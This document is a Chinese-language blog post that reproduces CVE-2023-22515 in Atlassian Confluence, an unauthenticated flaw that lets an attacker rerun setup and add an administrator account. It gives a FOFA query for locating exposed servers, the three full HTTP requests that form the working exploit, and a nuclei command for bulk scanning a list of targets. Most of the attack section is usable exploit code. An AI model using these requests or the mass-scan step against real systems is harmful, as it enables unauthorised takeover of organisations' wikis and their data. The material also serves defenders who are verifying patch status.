漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负

一:漏洞描述

Atlassian Confluence是企业广泛使用的wiki系统。
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。

二:漏洞影响版本

version>8.0.0

三:网络空间测绘查询

fofa:
app="ATLASSIAN-Confluence"
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)_第1张图片

四:漏洞复现

POC:
先覆盖目标Confluence服务器中的bootstrapStatusProvider.applicationConfig.setupComplete属性:

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0

然后新建管理员账户:

POST /setup/setupadministrator.action HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
X-Atlassian-Token: no-check

username=tbssec&fullName=tbssec&email=admin%40tbssec.com&password=tbssec&confirm=tbssec&setup-next-button=Next

接着完成安装请求:

POST /setup/finishsetup.action HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
X-Atlassian-Token: no-check

漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)_第2张图片
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)_第3张图片
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)_第4张图片
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)_第5张图片
此时用户已经创建完毕,登录
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)_第6张图片

五:批量验证

nuclei已上线该yaml (CVE-2023-22515)
.\nuclei.exe -t /http/cves/2023/CVE-2023-22515.yaml -l .\Confluence.txt -stats
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)_第7张图片

你可能感兴趣的:(漏洞复现,web安全,网络安全,安全)